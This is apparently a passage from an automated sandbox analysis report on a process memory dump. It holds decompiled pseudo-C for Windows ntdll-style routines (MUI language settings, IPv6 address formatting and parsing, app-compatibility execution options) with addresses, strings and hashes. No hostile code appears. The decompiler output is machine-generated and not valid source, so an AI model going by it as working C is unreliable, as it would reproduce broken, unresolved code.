							E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0272718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0270E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02702340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0271E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0270E2A8(_v12,  &_v68, _v16);
						if(E02725553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0271E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0270E2A8(_t322,  &_v68, _t296);
						if(E02725553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0270E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x02728788
0x02728788
0x02728791
0x02728794
0x02728798
0x0272879b
0x0272879e
0x027287a1
0x027287a4
0x027287a7
0x027287aa
0x027287af
0x02771ad3
0x02728b0a
0x02728b0d
0x02728b13
0x02728b19
0x02728b1f
0x02728b25
0x02728b2b
0x02728b31
0x02728b37
0x02728b3d
0x02728b46
0x02728b46
0x027287c6
0x027287d0
0x02771ae0
0x02771ae6
0x02771af8
0x02771af8
0x02771afd
0x02771afe
0x02771b01
0x02771b06
0x02771b06
0x027287d6
0x027287f2
0x027287f7
0x02728807
0x0272880a
0x0272880f
0x02728810
0x02728813
0x02728818
0x02728818
0x0272882c
0x02728831
0x02728838
0x02728908
0x02728920
0x027289f0
0x02728a08
0x02728af6
0x02728af6
0x02728af8
0x02728afb
0x02771beb
0x02771beb
0x02728b04
0x02771bf8
0x02771c0e
0x02771c13
0x02771c16
0x02771c16
0x02771bf8
0x00000000
0x02728b04
0x02728a0e
0x02728a11
0x02728a14
0x02728a15
0x02728a18
0x02728a22
0x02728b59
0x02728a28
0x02728a3c
0x02728a3c
0x02728a42
0x02771bb0
0x02771b11
0x02771b11
0x00000000
0x02728a48
0x02728a51
0x02728a5b
0x02728a5e
0x02728a61
0x02728a69
0x02728a69
0x02728a6d
0x00000000
0x00000000
0x02728a74
0x02728a7c
0x02728a7d
0x02728a91
0x02728a93
0x02728a93
0x02728a98
0x02728a9b
0x02728aa1
0x02728aa1
0x02728aa4
0x02728aaa
0x02728ab1
0x02728ac5
0x02728ac7
0x02728ac7
0x02728ac5
0x02728ace
0x02771bc9
0x02771bce
0x02771bd2
0x02771bd2
0x02728ad8
0x02728aeb
0x02728aeb
0x02728af0
0x02728af4
0x00000000
0x02728af4
0x02728a42
0x02728926
0x02728929
0x0272892c
0x0272892d
0x02728930
0x02728935
0x0272893a
0x02728b51
0x02728940
0x02728954
0x02728954
0x0272895a
0x02771b63
0x00000000
0x02728960
0x02728969
0x02728973
0x02728976
0x02728979
0x0272897e
0x02728981
0x02728981
0x02728986
0x00000000
0x00000000
0x02771b6e
0x02771b74
0x02771b7b
0x02771b8f
0x02771b91
0x02771b91
0x02771b99
0x02771b9c
0x02771ba2
0x02771ba2
0x0272898c
0x02728992
0x02728999
0x027289ad
0x02771ba8
0x02771ba8
0x027289ad
0x027289b6
0x027289c8
0x027289cd
0x027289d0
0x027289d0
0x027289d6
0x027289e8
0x027289e8
0x027289ed
0x00000000
0x027289ed
0x0272895a
0x0272883e
0x02728841
0x02728844
0x02728845
0x02728848
0x0272884d
0x02728852
0x02728b49
0x02728858
0x0272886c
0x0272886c
0x02728872
0x02771b0e
0x00000000
0x02728878
0x02728881
0x0272888b
0x0272888e
0x02728891
0x02728896
0x02728899
0x02728899
0x0272889e
0x00000000
0x00000000
0x02771b21
0x02771b27
0x02771b2e
0x02771b42
0x02771b44
0x02771b44
0x02771b4c
0x02771b4f
0x02771b55
0x02771b55
0x027288a4
0x027288aa
0x027288b1
0x027288c5
0x02771b5b
0x02771b5b
0x027288c5
0x027288ce
0x027288e0
0x027288e5
0x027288e8
0x027288e8
0x027288ee
0x02728900
0x02728900
0x02728905
0x00000000
0x02728905

APIs

_wcspbrk.LIBCMT ref: 02728891
_wcspbrk.LIBCMT ref: 02728979
_wcspbrk.LIBCMT ref: 02728A61
_wcspbrk.LIBCMT ref: 02728A9B
_wcspbrk.LIBCMT ref: 02771B9C

Strings

WindowsExcludedProcs, xrefs: 027287C1
Kernel-MUI-Language-Disallowed, xrefs: 02728914
Kernel-MUI-Language-Allowed, xrefs: 02728827
Kernel-MUI-Number-Allowed, xrefs: 027287E6
Kernel-MUI-Language-SKU, xrefs: 027289FC

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: b414455fdba511f83f318a58350aa0af5196bd32632cd625eab5c7f3ea7d1535
Instruction ID: c179e0343e9da99a538e30645f294d718fb7ead2a5bcc02249250be642f59d7c
Opcode Fuzzy Hash: b414455fdba511f83f318a58350aa0af5196bd32632cd625eab5c7f3ea7d1535
Instruction Fuzzy Hash: ABF1D3B2D00219EFCF12DF99C984DEEBBB9BF08304F14446AE505A7250E735AA49DF61

Uniqueness

Uniqueness Score: -1.00%

Function 027413CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E027413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02737707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2702926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02737707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2709cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02737707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02737707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02737707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02737707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x027413d5
0x027413d9
0x027413dc
0x027413de
0x027413e1
0x027413e8
0x027413ee
0x0276e8fd
0x00000000
0x0276e921
0x0276e921
0x0276e928
0x0276e982
0x0276e98a
0x00000000
0x0276e99a
0x0276e99e
0x0276e9a3
0x0276e9a8
0x0276e9b9
0x0276e978
0x00000000
0x0276e978
0x0276e98a
0x0276e92a
0x0276e931
0x0276e944
0x0276e944
0x0276e950
0x0276e954
0x0276e959
0x0276e95e
0x0276e963
0x0276e970
0x00000000
0x0276e975
0x0276e93b
0x0276e980
0x00000000
0x0276e980
0x0276e942
0x0276e94b
0x00000000
0x0276e94b
0x00000000
0x0276e942
0x027413f4
0x027413f4
0x027413f9
0x027413fc
0x027413ff
0x02741406
0x0276e9cc
0x0276e9d2
0x0276e9d2
0x0276e9cc
0x0274140c
0x02741411
0x02741431
0x0274143a
0x0274143c
0x0274143f
0x0274143f
0x02741442
0x02741447
0x027414a8
0x027414ac
0x0276e9e2
0x0276e9e7
0x0276e9ec
0x0276ea05
0x0276ea05
0x00000000
0x02741449
0x00000000
0x02741449
0x0274144c
0x02741459
0x02741462
0x02741469
0x0274146a
0x02741470
0x02741473
0x02741476
0x02741476
0x02741490
0x02741495
0x0274138e
0x02741390
0x02741397
0x02741398
0x02741399
0x027413a1
0x027413a4
0x027413a4
0x02741498
0x0274149c
0x0274149f
0x027414a2
0x00000000
0x00000000
0x027414a4
0x00000000
0x027414a4
0x02741413
0x02741415
0x02741416
0x02741419
0x0274141c
0x02741422
0x027413b7
0x027413bc
0x027413bf
0x027413bf
0x027413c2
0x02741424
0x02741424
0x02741424
0x02741427
0x0274142b
0x0274142c
0x0274142c
0x0274142c
0x00000000
0x0274141c
0x02741411

APIs

___swprintf_l.LIBCMT ref: 0274146B
___swprintf_l.LIBCMT ref: 02741490
___swprintf_l.LIBCMT ref: 0276E970

Strings

::%hs%u.%u.%u.%u, xrefs: 0276E967
::ffff:0:%u.%u.%u.%u, xrefs: 0276E9B0
ffff:, xrefs: 0276E94B
:%u.%u.%u.%u, xrefs: 0276E9F4

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d60feac70aa5419442886eeb90c0bd2e81553469a16af78f568849cb3de6df5a
Instruction ID: 5969930031b46af7943738545f955bd230ffc4f431462ac381174182200743be
Opcode Fuzzy Hash: d60feac70aa5419442886eeb90c0bd2e81553469a16af78f568849cb3de6df5a
Instruction Fuzzy Hash: F16136B1D00655EACF25EFADC8809BFBBF5EF84304794C02DE99A47541DB30A680CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02737EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E02737EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x27e2088; // 0x777f16a6
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02737F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02753F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0270DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x27e4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02753F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02710D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02753F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02718375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02753F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0277E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02753F92();
					_t38 = 1;
					L2:
					return E0270E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x02737f08
0x02737f0f
0x02737f12
0x02737f1b
0x02737f31
0x02753ead
0x02753eb4
0x00000000
0x00000000
0x02753eba
0x02753ecd
0x02753ed2
0x02753ee1
0x02753ee7
0x02753eec
0x02753f12
0x02753f18
0x02753f1a
0x00000000
0x00000000
0x02753f20
0x02753f26
0x02753f28
0x00000000
0x00000000
0x02753f2e
0x02753f30
0x00000000
0x00000000
0x02753f3a
0x02753f3b
0x02753f53
0x02753f64
0x02753f69
0x02753f6c
0x02753f6d
0x02753f6f
0x0275e304
0x0275e30f
0x0275e315
0x0275e31e
0x0275e321
0x0275e327
0x0275e329
0x00000000
0x00000000
0x00000000
0x00000000
0x0275e32f
0x0275e32f
0x0275e337
0x0275e33a
0x0275e33b
0x0275e33d
0x0275e33f
0x0275e341
0x0275e341
0x0275e34e
0x0275e353
0x0275e358
0x0275e35d
0x0275e35f
0x00000000
0x00000000
0x0275e365
0x0275e365
0x0275e368
0x0275e36e
0x00000000
0x00000000
0x0275e374
0x0275e32f
0x02753f75
0x02753f7a
0x02753f7c
0x02753f7e
0x02753f86
0x02737f39
0x02737f47
0x02737f47
0x02737f37
0x02737f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02753F12

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02753EC4
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02753F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 0275E345
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02753F4A
ExecuteOptions, xrefs: 02753F04
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0275E2FB
Execute=1, xrefs: 02753F5E

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377593252.00000000027F0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377641696.0000000002850000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 75301c2b37f694624764c21d852a8747eccf0964749d7d619882a07f767e1da3
Instruction ID: 5656a5ba57fdddf86f893db12ea92ec7b97a6bd13d8f28fa41191a3259c60d4c
Opcode Fuzzy Hash: 75301c2b37f694624764c21d852a8747eccf0964749d7d619882a07f767e1da3
Instruction Fuzzy Hash: CE41C97268021DBAEF219A94DCCDFDAB3FDAB15704F000499A505E60D2EB71AA458F61

Uniqueness

Uniqueness Score: -1.00%

Function 02740B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02740B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E02718980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E0270DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E02740CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E02740CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E027406BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E027406BA(_t135, _t178) == 0 || E02740A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E02740CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E02740CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E027406BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E027406BA(_t124, _t142) == 0 || E02740A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x02740b21
0x02740b24
0x02740b27
0x02740b2a
0x02740b2d
0x02740b30
0x02740b33
0x02740b36
0x02740b39
0x02740b3e
0x02740c65
0x02740c68
0x02740c6a
0x02740c6f
0x0276eb42
0x00000000
0x00000000
0x0276eb48
0x0276eb48
0x02740c75
0x02740c7a
0x0276eb54
0x00000000
0x00000000
0x00000000
0x0276eb5a
0x02740c80
0x02740c84
0x0276eb98
0x00000000
0x00000000
0x0276eba6
0x02740cb8
0x02740cba
0x02740cd3
0x02740cda
0x02740ce4
0x02740ce9
0x00000000
0x02740cec
0x02740c8c
0x0276eb63
0x00000000
0x00000000
0x0276eb70
0x0276eb75
0x0276eb7d
0x00000000
0x00000000
0x0276eb8c
0x00000000
0x0276eb8c
0x02740c96
0x00000000
0x00000000
0x02740ca2
0x02740cac
0x02740cb4
0x00000000
0x00000000
0x02740b44
0x02740b47
0x02740b49
0x00000000
0x00000000
0x02740b4f
0x02740b50
0x00000000
0x00000000
0x02740b56
0x02740b62
0x02740b7c
0x02740bac
0x02740a0f
0x0276eaaa
0x00000000
0x0276eac4
0x0276eac4
0x02740bd0
0x02740bd0
0x02740bd4
0x02740bd9
0x00000000
0x00000000
0x02740bdb
0x02740be0
0x0276eb0e
0x02740a1a
0x00000000
0x02740a1a
0x0276eb1a
0x0276eb1f
0x0276eb27
0x00000000
0x00000000
0x0276eb36
0x00000000
0x0276eb36
0x02740bea
0x00000000
0x00000000
0x02740bf6
0x02740c00
0x02740c03
0x02740c0b
0x00000000
0x02740c0b
0x0276eaaa
0x00000000
0x02740a15
0x02740bb6
0x00000000
0x02740bc6
0x02740bc6
0x02740bcb
0x02740c15
0x00000000
0x00000000
0x02740c1d
0x02740c20
0x02740c21
0x02740c24
0x02740c24
0x02740c26
0x00000000
0x02740c26
0x02740bcd
0x00000000
0x02740bcd
0x02740b89
0x02740b89
0x02740b90
0x00000000
0x00000000
0x02740b96
0x00000000
0x02740b96
0x02740a04
0x02740a04
0x02740b9a
0x02740b9a
0x02740b9b
0x02740b9f
0x00000000
0x00000000
0x00000000
0x02740ba5
0x02740ac7
0x02740aca
0x0276eacf
0x00000000
0x0276eade
0x0276eade
0x0276eae3
0x00000000
0x00000000
0x0276eaf3
0x0276eaf6
0x0276eaf7
0x0276eafe
0x0276eb01
0x00000000
0x0276eb01
0x0276eacf
0x02740ad0
0x02740ad4
0x00000000
0x00000000
0x02740ada
0x02740ae6
0x02740c34
0x00000000
0x02740c47
0x02740c49
0x02740c4a
0x02740c4e
0x02740c51
0x02740c54
0x02740c57
0x02740c5a
0x00000000
0x00000000
0x00000000
0x02740c60
0x02740afb
0x02740afe
0x02740b02
0x02740b05
0x02740b08
0x00000000
0x02740b08
0x02740ae6
0x02740b44
0x027409f8
0x027409f8
0x027409f9
0x00000000
0x00000000
0x0276eaa0
0x00000000

APIs

__fassign.LIBCMT ref: 02740BF6
__fassign.LIBCMT ref: 02740CA2

Strings

:, xrefs: 02740AC7
., xrefs: 02740A0C
:, xrefs: 02740BA9

Memory Dump Source

Source File: 0000000E.00000002.2377445124.00000000026F0000.00000040.00000001.sdmp, Offset: 026E0000, based on PE: true

Associated: 0000000E.00000002.2377438870.00000000026E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377563820.00000000027D0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377571148.00000000027E0000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377579086.00000000027E4000.00000040.00000001.sdmp Download File
Associated: 0000000E.00000002.2377586568.00000000027E7000.00000040.00000001.sdmp Download File
